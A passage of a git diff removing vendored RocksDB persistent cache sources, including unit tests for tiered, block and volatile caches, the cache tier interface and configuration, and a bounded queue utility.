-  return NewTieredCache(Env::Default(), dbname, static_cast<size_t>(memory_size));
-}
-
-#ifdef OS_LINUX
-static void UniqueIdCallback(void* arg) {
-  int* result = reinterpret_cast<int*>(arg);
-  if (*result == -1) {
-    *result = 0;
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-}
-#endif
-
-TEST_F(PersistentCacheTierTest, FactoryTest) {
-  for (auto nvm_opt : {true, false}) {
-    ASSERT_FALSE(cache_);
-    auto log = std::make_shared<ConsoleLogger>();
-    std::shared_ptr<PersistentCache> cache;
-    ASSERT_OK(NewPersistentCache(Env::Default(), path_,
-                                 /*size=*/1 * 1024 * 1024 * 1024, log, nvm_opt,
-                                 &cache));
-    ASSERT_TRUE(cache);
-    ASSERT_EQ(cache->Stats().size(), 1);
-    ASSERT_TRUE(cache->Stats()[0].size());
-    cache.reset();
-  }
-}
-
-PersistentCacheDBTest::PersistentCacheDBTest() : DBTestBase("/cache_test") {
-#ifdef OS_LINUX
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewRandomAccessFile:O_DIRECT",
-                                                 OnOpenForRead);
-#endif
-}
-
-// test template
-void PersistentCacheDBTest::RunTest(
-    const std::function<std::shared_ptr<PersistentCacheTier>(bool)>& new_pcache,
-    const size_t max_keys = 100 * 1024, const size_t max_usecase = 5) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-
-  // number of insertion interations
-  int num_iter = static_cast<int>(max_keys * kStressFactor);
-
-  for (size_t iter = 0; iter < max_usecase; iter++) {
-    Options options;
-    options.write_buffer_size =
-      static_cast<size_t>(64 * 1024 * kStressFactor);  // small write buffer
-    options.statistics = rocksdb::CreateDBStatistics();
-    options = CurrentOptions(options);
-
-    // setup page cache
-    std::shared_ptr<PersistentCacheTier> pcache;
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-
-    const size_t size_max = std::numeric_limits<size_t>::max();
-
-    switch (iter) {
-      case 0:
-        // page cache, block cache, no-compressed cache
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 1:
-        // page cache, block cache, compressed cache
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = NewLRUCache(size_max);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 2:
-        // page cache, block cache, compressed cache + KNoCompression
-        // both block cache and compressed cache, but DB is not compressed
-        // also, make block cache sizes bigger, to trigger block cache hits
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = NewLRUCache(size_max);
-        table_options.block_cache_compressed = NewLRUCache(size_max);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        options.compression = kNoCompression;
-        break;
-      case 3:
-        // page cache, no block cache, no compressed cache
-        pcache = new_pcache(/*is_compressed=*/false);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 4:
-        // page cache, no block cache, no compressed cache
-        // Page cache caches compressed blocks
-        pcache = new_pcache(/*is_compressed=*/true);
-        table_options.persistent_cache = pcache;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      default:
-        FAIL();
-    }
-
-    std::vector<std::string> values;
-    // insert data
-    Insert(options, table_options, num_iter, &values);
-    // flush all data in cache to device
-    pcache->TEST_Flush();
-    // verify data
-    Verify(num_iter, values);
-
-    auto block_miss = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    auto compressed_block_hit =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT);
-    auto compressed_block_miss =
-        TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS);
-    auto page_hit = TestGetTickerCount(options, PERSISTENT_CACHE_HIT);
-    auto page_miss = TestGetTickerCount(options, PERSISTENT_CACHE_MISS);
-
-    // check that we triggered the appropriate code paths in the cache
-    switch (iter) {
-      case 0:
-        // page cache, block cache, no-compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_EQ(compressed_block_miss, 0);
-        ASSERT_EQ(compressed_block_hit, 0);
-        break;
-      case 1:
-        // page cache, block cache, compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_GT(compressed_block_miss, 0);
-        break;
-      case 2:
-        // page cache, block cache, compressed cache + KNoCompression
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_GT(block_miss, 0);
-        ASSERT_GT(compressed_block_miss, 0);
-        // remember kNoCompression
-        ASSERT_EQ(compressed_block_hit, 0);
-        break;
-      case 3:
-      case 4:
-        // page cache, no block cache, no compressed cache
-        ASSERT_GT(page_miss, 0);
-        ASSERT_GT(page_hit, 0);
-        ASSERT_EQ(compressed_block_hit, 0);
-        ASSERT_EQ(compressed_block_miss, 0);
-        break;
-      default:
-        FAIL();
-    }
-
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-
-    pcache->Close();
-  }
-}
-
-#ifdef TRAVIS
-// Travis is unable to handle the normal version of the tests running out of
-// fds, out of space and timeouts. This is an easier version of the test
-// specifically written for Travis
-TEST_F(PersistentCacheDBTest, BasicTest) {
-  RunTest(std::bind(&MakeBlockCache, dbname_), /*max_keys=*/1024,
-          /*max_usecase=*/1);
-}
-#else
-// test table with block page cache
-TEST_F(PersistentCacheDBTest, BlockCacheTest) {
-  RunTest(std::bind(&MakeBlockCache, dbname_));
-}
-
-// test table with volatile page cache
-TEST_F(PersistentCacheDBTest, VolatileCacheTest) {
-  RunTest(std::bind(&MakeVolatileCache, dbname_));
-}
-
-// test table with tiered page cache
-TEST_F(PersistentCacheDBTest, TieredCacheTest) {
-  RunTest(std::bind(&MakeTieredCache, dbname_));
-}
-#endif
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-int main() { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h
deleted file mode 100644
index 77fd172..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.h
+++ /dev/null
@@ -1,285 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <limits>
-#include <list>
-#include <memory>
-#include <string>
-#include <thread>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "rocksdb/cache.h"
-#include "table/block_builder.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/testharness.h"
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-namespace rocksdb {
-
-//
-// Unit tests for testing PersistentCacheTier
-//
-class PersistentCacheTierTest : public testing::Test {
- public:
-  PersistentCacheTierTest();
-  virtual ~PersistentCacheTierTest() {
-    if (cache_) {
-      Status s = cache_->Close();
-      assert(s.ok());
-    }
-  }
-
- protected:
-  // Flush cache
-  void Flush() {
-    if (cache_) {
-      cache_->TEST_Flush();
-    }
-  }
-
-  // create threaded workload
-  template <class T>
-  std::list<port::Thread> SpawnThreads(const size_t n, const T& fn) {
-    std::list<port::Thread> threads;
-    for (size_t i = 0; i < n; i++) {
-      port::Thread th(fn);
-      threads.push_back(std::move(th));
-    }
-    return threads;
-  }
-
-  // Wait for threads to join
-  void Join(std::list<port::Thread>&& threads) {
-    for (auto& th : threads) {
-      th.join();
-    }
-    threads.clear();
-  }
-
-  // Run insert workload in threads
-  void Insert(const size_t nthreads, const size_t max_keys) {
-    key_ = 0;
-    max_keys_ = max_keys;
-    // spawn threads
-    auto fn = std::bind(&PersistentCacheTierTest::InsertImpl, this);
-    auto threads = SpawnThreads(nthreads, fn);
-    // join with threads
-    Join(std::move(threads));
-    // Flush cache
-    Flush();
-  }
-
-  // Run verification on the cache
-  void Verify(const size_t nthreads = 1, const bool eviction_enabled = false) {
-    stats_verify_hits_ = 0;
-    stats_verify_missed_ = 0;
-    key_ = 0;
-    // spawn threads
-    auto fn =
-        std::bind(&PersistentCacheTierTest::VerifyImpl, this, eviction_enabled);
-    auto threads = SpawnThreads(nthreads, fn);
-    // join with threads
-    Join(std::move(threads));
-  }
-
-  // pad 0 to numbers
-  std::string PaddedNumber(const size_t data, const size_t pad_size) {
-    assert(pad_size);
-    char* ret = new char[pad_size];
-    int pos = static_cast<int>(pad_size) - 1;
-    size_t count = 0;
-    size_t t = data;
-    // copy numbers
-    while (t) {
-      count++;
-      ret[pos--] = '0' + t % 10;
-      t = t / 10;
-    }
-    // copy 0s
-    while (pos >= 0) {
-      ret[pos--] = '0';
-    }
-    // post condition
-    assert(count <= pad_size);
-    assert(pos == -1);
-    std::string result(ret, pad_size);
-    delete[] ret;
-    return result;
-  }
-
-  // Insert workload implementation
-  void InsertImpl() {
-    const std::string prefix = "key_prefix_";
-
-    while (true) {
-      size_t i = key_++;
-      if (i >= max_keys_) {
-        break;
-      }
-
-      char data[4 * 1024];
-      memset(data, '0' + (i % 10), sizeof(data));
-      auto k = prefix + PaddedNumber(i, /*count=*/8);
-      Slice key(k);
-      while (true) {
-        Status status = cache_->Insert(key, data, sizeof(data));
-        if (status.ok()) {
-          break;
-        }
-        ASSERT_TRUE(status.IsTryAgain());
-        Env::Default()->SleepForMicroseconds(1 * 1000 * 1000);
-      }
-    }
-  }
-
-  // Verification implementation
-  void VerifyImpl(const bool eviction_enabled = false) {
-    const std::string prefix = "key_prefix_";
-    while (true) {
-      size_t i = key_++;
-      if (i >= max_keys_) {
-        break;
-      }
-
-      char edata[4 * 1024];
-      memset(edata, '0' + (i % 10), sizeof(edata));
-      auto k = prefix + PaddedNumber(i, /*count=*/8);
-      Slice key(k);
-      unique_ptr<char[]> block;
-      size_t block_size;
-
-      if (eviction_enabled) {
-        if (!cache_->Lookup(key, &block, &block_size).ok()) {
-          // assume that the key is evicted
-          stats_verify_missed_++;
-          continue;
-        }
-      }
-
-      ASSERT_OK(cache_->Lookup(key, &block, &block_size));
-      ASSERT_EQ(block_size, sizeof(edata));
-      ASSERT_EQ(memcmp(edata, block.get(), sizeof(edata)), 0);
-      stats_verify_hits_++;
-    }
-  }
-
-  // template for insert test
-  void RunInsertTest(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads);
-    ASSERT_EQ(stats_verify_hits_, max_keys);
-    ASSERT_EQ(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  // template for negative insert test
-  void RunNegativeInsertTest(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads, /*eviction_enabled=*/true);
-    ASSERT_LT(stats_verify_hits_, max_keys);
-    ASSERT_GT(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  // template for insert with eviction test
-  void RunInsertTestWithEviction(const size_t nthreads, const size_t max_keys) {
-    Insert(nthreads, max_keys);
-    Verify(nthreads, /*eviction_enabled=*/true);
-    ASSERT_EQ(stats_verify_hits_ + stats_verify_missed_, max_keys);
-    ASSERT_GT(stats_verify_hits_, 0);
-    ASSERT_GT(stats_verify_missed_, 0);
-
-    cache_->Close();
-    cache_.reset();
-  }
-
-  const std::string path_;
-  shared_ptr<Logger> log_;
-  std::shared_ptr<PersistentCacheTier> cache_;
-  std::atomic<size_t> key_{0};
-  size_t max_keys_ = 0;
-  std::atomic<size_t> stats_verify_hits_{0};
-  std::atomic<size_t> stats_verify_missed_{0};
-};
-
-//
-// RocksDB tests
-//
-class PersistentCacheDBTest : public DBTestBase {
- public:
-  PersistentCacheDBTest();
-
-  static uint64_t TestGetTickerCount(const Options& options,
-                                     Tickers ticker_type) {
-    return static_cast<uint32_t>(
-        options.statistics->getTickerCount(ticker_type));
-  }
-
-  // insert data to table
-  void Insert(const Options& options,
-              const BlockBasedTableOptions& table_options, const int num_iter,
-              std::vector<std::string>* values) {
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // default column family doesn't have block cache
-    Options no_block_cache_opts;
-    no_block_cache_opts.statistics = options.statistics;
-    no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-    BlockBasedTableOptions table_options_no_bc;
-    table_options_no_bc.no_block_cache = true;
-    no_block_cache_opts.table_factory.reset(
-        NewBlockBasedTableFactory(table_options_no_bc));
-    ReopenWithColumnFamilies(
-        {"default", "pikachu"},
-        std::vector<Options>({no_block_cache_opts, options}));
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::string str;
-    for (int i = 0; i < num_iter; i++) {
-      if (i % 4 == 0) {  // high compression ratio
-        str = RandomString(&rnd, 1000);
-      }
-      values->push_back(str);
-      ASSERT_OK(Put(1, Key(i), (*values)[i]));
-    }
-
-    // flush all data from memtable so that reads are from block cache
-    ASSERT_OK(Flush(1));
-  }
-
-  // verify data
-  void Verify(const int num_iter, const std::vector<std::string>& values) {
-    for (int j = 0; j < 2; ++j) {
-      for (int i = 0; i < num_iter; i++) {
-        ASSERT_EQ(Get(1, Key(i)), values[i]);
-      }
-    }
-  }
-
-  // test template
-  void RunTest(const std::function<std::shared_ptr<PersistentCacheTier>(bool)>&
-                   new_pcache,
-               const size_t max_keys, const size_t max_usecase);
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc
deleted file mode 100644
index 0f500e8..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.cc
+++ /dev/null
@@ -1,168 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-
-#include "inttypes.h"
-
-#include <string>
-#include <sstream>
-
-namespace rocksdb {
-
-std::string PersistentCacheConfig::ToString() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "    path: %s\n", path.c_str());
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    enable_direct_reads: %d\n",
-           enable_direct_reads);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    enable_direct_writes: %d\n",
-           enable_direct_writes);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    cache_size: %" PRIu64 "\n", cache_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    cache_file_size: %" PRIu32 "\n",
-           cache_file_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    writer_qdepth: %" PRIu32 "\n",
-           writer_qdepth);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    pipeline_writes: %d\n", pipeline_writes);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "    max_write_pipeline_backlog_size: %" PRIu64 "\n",
-           max_write_pipeline_backlog_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    write_buffer_size: %" PRIu32 "\n",
-           write_buffer_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    writer_dispatch_size: %" PRIu64 "\n",
-           writer_dispatch_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "    is_compressed: %d\n", is_compressed);
-  ret.append(buffer);
-
-  return ret;
-}
-
-//
-// PersistentCacheTier implementation
-//
-Status PersistentCacheTier::Open() {
-  if (next_tier_) {
-    return next_tier_->Open();
-  }
-  return Status::OK();
-}
-
-Status PersistentCacheTier::Close() {
-  if (next_tier_) {
-    return next_tier_->Close();
-  }
-  return Status::OK();
-}
-
-bool PersistentCacheTier::Reserve(const size_t size) {
-  // default implementation is a pass through
-  return true;
-}
-
-bool PersistentCacheTier::Erase(const Slice& key) {
-  // default implementation is a pass through since not all cache tiers might
-  // support erase
-  return true;
-}
-
-std::string PersistentCacheTier::PrintStats() {
-  std::ostringstream os;
-  for (auto tier_stats : Stats()) {
-    os << "---- next tier -----" << std::endl;
-    for (auto stat : tier_stats) {
-      os << stat.first << ": " << stat.second << std::endl;
-    }
-  }
-  return os.str();
-}
-
-PersistentCache::StatsType PersistentCacheTier::Stats() {
-  if (next_tier_) {
-    return next_tier_->Stats();
-  }
-  return PersistentCache::StatsType{};
-}
-
-//
-// PersistentTieredCache implementation
-//
-PersistentTieredCache::~PersistentTieredCache() { assert(tiers_.empty()); }
-
-Status PersistentTieredCache::Open() {
-  assert(!tiers_.empty());
-  return tiers_.front()->Open();
-}
-
-Status PersistentTieredCache::Close() {
-  assert(!tiers_.empty());
-  Status status = tiers_.front()->Close();
-  if (status.ok()) {
-    tiers_.clear();
-  }
-  return status;
-}
-
-bool PersistentTieredCache::Erase(const Slice& key) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Erase(key);
-}
-
-PersistentCache::StatsType PersistentTieredCache::Stats() {
-  assert(!tiers_.empty());
-  return tiers_.front()->Stats();
-}
-
-std::string PersistentTieredCache::PrintStats() {
-  assert(!tiers_.empty());
-  return tiers_.front()->PrintStats();
-}
-
-Status PersistentTieredCache::Insert(const Slice& page_key, const char* data,
-                                     const size_t size) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Insert(page_key, data, size);
-}
-
-Status PersistentTieredCache::Lookup(const Slice& page_key,
-                                     std::unique_ptr<char[]>* data,
-                                     size_t* size) {
-  assert(!tiers_.empty());
-  return tiers_.front()->Lookup(page_key, data, size);
-}
-
-void PersistentTieredCache::AddTier(const Tier& tier) {
-  if (!tiers_.empty()) {
-    tiers_.back()->set_next_tier(tier);
-  }
-  tiers_.push_back(tier);
-}
-
-bool PersistentTieredCache::IsCompressed() {
-  assert(tiers_.size());
-  return tiers_.front()->IsCompressed();
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h
deleted file mode 100644
index 25e0b3c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_tier.h
+++ /dev/null
@@ -1,336 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <list>
-#include <map>
-#include <string>
-#include <vector>
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/status.h"
-
-// Persistent Cache
-//
-// Persistent cache is tiered key-value cache that can use persistent medium. It
-// is a generic design and can leverage any storage medium -- disk/SSD/NVM/RAM.
-// The code has been kept generic but significant benchmark/design/development
-// time has been spent to make sure the cache performs appropriately for
-// respective storage medium.
-// The file defines
-// PersistentCacheTier    : Implementation that handles individual cache tier
-// PersistentTieresCache  : Implementation that handles all tiers as a logical
-//                          unit
-//
-// PersistentTieredCache architecture:
-// +--------------------------+ PersistentCacheTier that handles multiple tiers
-// | +----------------+       |
-// | | RAM            | PersistentCacheTier that handles RAM (VolatileCacheImpl)
-// | +----------------+       |
-// |   | next                 |
-// |   v                      |
-// | +----------------+       |
-// | | NVM            | PersistentCacheTier implementation that handles NVM
-// | +----------------+ (BlockCacheImpl)
-// |   | next                 |
-// |   V                      |
-// | +----------------+       |
-// | | LE-SSD         | PersistentCacheTier implementation that handles LE-SSD
-// | +----------------+ (BlockCacheImpl)
-// |   |                      |
-// |   V                      |
-// |  null                    |
-// +--------------------------+
-//               |
-//               V
-//              null
-namespace rocksdb {
-
-// Persistent Cache Config
-//
-// This struct captures all the options that are used to configure persistent
-// cache. Some of the terminologies used in naming the options are
-//
-// dispatch size :
-// This is the size in which IO is dispatched to the device
-//
-// write buffer size :
-// This is the size of an individual write buffer size. Write buffers are
-// grouped to form buffered file.
-//
-// cache size :
-// This is the logical maximum for the cache size
-//
-// qdepth :
-// This is the max number of IOs that can issues to the device in parallel
-//
-// pepeling :
-// The writer code path follows pipelined architecture, which means the
-// operations are handed off from one stage to another
-//
-// pipelining backlog size :
-// With the pipelined architecture, there can always be backlogging of ops in
-// pipeline queues. This is the maximum backlog size after which ops are dropped
-// from queue
-struct PersistentCacheConfig {
-  explicit PersistentCacheConfig(
-      Env* const _env, const std::string& _path, const uint64_t _cache_size,
-      const std::shared_ptr<Logger>& _log,
-      const uint32_t _write_buffer_size = 1 * 1024 * 1024 /*1MB*/) {
-    env = _env;
-    path = _path;
-    log = _log;
-    cache_size = _cache_size;
-    writer_dispatch_size = write_buffer_size = _write_buffer_size;
-  }
-
-  //
-  // Validate the settings. Our intentions are to catch erroneous settings ahead
-  // of time instead going violating invariants or causing dead locks.
-  //
-  Status ValidateSettings() const {
-    // (1) check pre-conditions for variables
-    if (!env || path.empty()) {
-      return Status::InvalidArgument("empty or null args");
-    }
-
-    // (2) assert size related invariants
-    // - cache size cannot be less than cache file size
-    // - individual write buffer size cannot be greater than cache file size
-    // - total write buffer size cannot be less than 2X cache file size
-    if (cache_size < cache_file_size || write_buffer_size >= cache_file_size ||
-        write_buffer_size * write_buffer_count() < 2 * cache_file_size) {
-      return Status::InvalidArgument("invalid cache size");
-    }
-
-    // (2) check writer settings
-    // - Queue depth cannot be 0
-    // - writer_dispatch_size cannot be greater than writer_buffer_size
-    // - dispatch size and buffer size need to be aligned
-    if (!writer_qdepth || writer_dispatch_size > write_buffer_size ||
-        write_buffer_size % writer_dispatch_size) {
-      return Status::InvalidArgument("invalid writer settings");
-    }
-
-    return Status::OK();
-  }
-
-  //
-  // Env abstraction to use for systmer level operations
-  //
-  Env* env;
-
-  //
-  // Path for the block cache where blocks are persisted
-  //
-  std::string path;
-
-  //
-  // Log handle for logging messages
-  //
-  std::shared_ptr<Logger> log;
-
-  //
-  // Enable direct IO for reading
-  //
-  bool enable_direct_reads = true;
-
-  //
-  // Enable direct IO for writing
-  //
-  bool enable_direct_writes = false;
-
-  //
-  // Logical cache size
-  //
-  uint64_t cache_size = std::numeric_limits<uint64_t>::max();
-
-  // cache-file-size
-  //
-  // Cache consists of multiples of small files. This parameter defines the
-  // size of an individual cache file
-  //
-  // default: 1M
-  uint32_t cache_file_size = 100ULL * 1024 * 1024;
-
-  // writer-qdepth
-  //
-  // The writers can issues IO to the devices in parallel. This parameter
-  // controls the max number if IOs that can issues in parallel to the block
-  // device
-  //
-  // default :1
-  uint32_t writer_qdepth = 1;
-
-  // pipeline-writes
-  //
-  // The write optionally follow pipelined architecture. This helps
-  // avoid regression in the eviction code path of the primary tier. This
-  // parameter defines if pipelining is enabled or disabled
-  //
-  // default: true
-  bool pipeline_writes = true;
-
-  // max-write-pipeline-backlog-size
-  //
-  // Max pipeline buffer size. This is the maximum backlog we can accumulate
-  // while waiting for writes. After the limit, new ops will be dropped.
-  //
-  // Default: 1GiB
-  uint64_t max_write_pipeline_backlog_size = 1ULL * 1024 * 1024 * 1024;
-
-  // write-buffer-size
-  //
-  // This is the size in which buffer slabs are allocated.
-  //
-  // Default: 1M
-  uint32_t write_buffer_size = 1ULL * 1024 * 1024;
-
-  // write-buffer-count
-  //
-  // This is the total number of buffer slabs. This is calculated as a factor of
-  // file size in order to avoid dead lock.
-  size_t write_buffer_count() const {
-    assert(write_buffer_size);
-    return static_cast<size_t>((writer_qdepth + 1.2) * cache_file_size /
-                               write_buffer_size);
-  }
-
-  // writer-dispatch-size
-  //
-  // The writer thread will dispatch the IO at the specified IO size
-  //
-  // default: 1M
-  uint64_t writer_dispatch_size = 1ULL * 1024 * 1024;
-
-  // is_compressed
-  //
-  // This option determines if the cache will run in compressed mode or
-  // uncompressed mode
-  bool is_compressed = true;
-
-  PersistentCacheConfig MakePersistentCacheConfig(
-      const std::string& path, const uint64_t size,
-      const std::shared_ptr<Logger>& log);
-
-  std::string ToString() const;
-};
-
-// Persistent Cache Tier
-//
-// This a logical abstraction that defines a tier of the persistent cache. Tiers
-// can be stacked over one another. PersistentCahe provides the basic definition
-// for accessing/storing in the cache. PersistentCacheTier extends the interface
-// to enable management and stacking of tiers.
-class PersistentCacheTier : public PersistentCache {
- public:
-  typedef std::shared_ptr<PersistentCacheTier> Tier;
-
-  virtual ~PersistentCacheTier() {}
-
-  // Open the persistent cache tier
-  virtual Status Open();
-
-  // Close the persistent cache tier
-  virtual Status Close();
-
-  // Reserve space up to 'size' bytes
-  virtual bool Reserve(const size_t size);
-
-  // Erase a key from the cache
-  virtual bool Erase(const Slice& key);
-
-  // Print stats to string recursively
-  virtual std::string PrintStats();
-
-  virtual PersistentCache::StatsType Stats();
-
-  // Insert to page cache
-  virtual Status Insert(const Slice& page_key, const char* data,
-                        const size_t size) = 0;
-
-  // Lookup page cache by page identifier
-  virtual Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                        size_t* size) = 0;
-
-  // Does it store compressed data ?
-  virtual bool IsCompressed() = 0;
-
-  virtual std::string GetPrintableOptions() const = 0;
-
-  // Return a reference to next tier
-  virtual Tier& next_tier() { return next_tier_; }
-
-  // Set the value for next tier
-  virtual void set_next_tier(const Tier& tier) {
-    assert(!next_tier_);
-    next_tier_ = tier;
-  }
-
-  virtual void TEST_Flush() {
-    if (next_tier_) {
-      next_tier_->TEST_Flush();
-    }
-  }
-
- private:
-  Tier next_tier_;  // next tier
-};
-
-// PersistentTieredCache
-//
-// Abstraction that helps you construct a tiers of persistent caches as a
-// unified cache. The tier(s) of cache will act a single tier for management
-// ease and support PersistentCache methods for accessing data.
-class PersistentTieredCache : public PersistentCacheTier {
- public:
-  virtual ~PersistentTieredCache();
-
-  Status Open() override;
-  Status Close() override;
-  bool Erase(const Slice& key) override;
-  std::string PrintStats() override;
-  PersistentCache::StatsType Stats() override;
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override;
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-  bool IsCompressed() override;
-
-  std::string GetPrintableOptions() const override {
-    return "PersistentTieredCache";
-  }
-
-  void AddTier(const Tier& tier);
-
-  Tier& next_tier() override {
-    auto it = tiers_.end();
-    return (*it)->next_tier();
-  }
-
-  void set_next_tier(const Tier& tier) override {
-    auto it = tiers_.end();
-    (*it)->set_next_tier(tier);
-  }
-
-  void TEST_Flush() override {
-    assert(!tiers_.empty());
-    tiers_.front()->TEST_Flush();
-    PersistentCacheTier::TEST_Flush();
-  }
-
- protected:
-  std::list<Tier> tiers_;  // list of tiers top-down
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h
deleted file mode 100644
index 214bb58..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_util.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <limits>
-#include <list>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// Simple synchronized queue implementation with the option of
-// bounding the queue
-//
-// On overflow, the elements will be discarded
-//
-template <class T>
-class BoundedQueue {
- public:
-  explicit BoundedQueue(
-      const size_t max_size = std::numeric_limits<size_t>::max())
-      : cond_empty_(&lock_), max_size_(max_size) {}
-
-  virtual ~BoundedQueue() {}
-
-  void Push(T&& t) {
-    MutexLock _(&lock_);
-    if (max_size_ != std::numeric_limits<size_t>::max() &&
-        size_ + t.Size() >= max_size_) {
-      // overflow
-      return;
-    }
-
-    size_ += t.Size();
-    q_.push_back(std::move(t));
-    cond_empty_.SignalAll();
-  }
-
-  T Pop() {
-    MutexLock _(&lock_);
-    while (q_.empty()) {
-      cond_empty_.Wait();
-    }
-
-    T t = std::move(q_.front());
-    size_ -= t.Size();
-    q_.pop_front();
-    return std::move(t);
-  }
-
-  size_t Size() const {
-    MutexLock _(&lock_);
-    return size_;
-  }
-
- private:
-  mutable port::Mutex lock_;
-  port::CondVar cond_empty_;
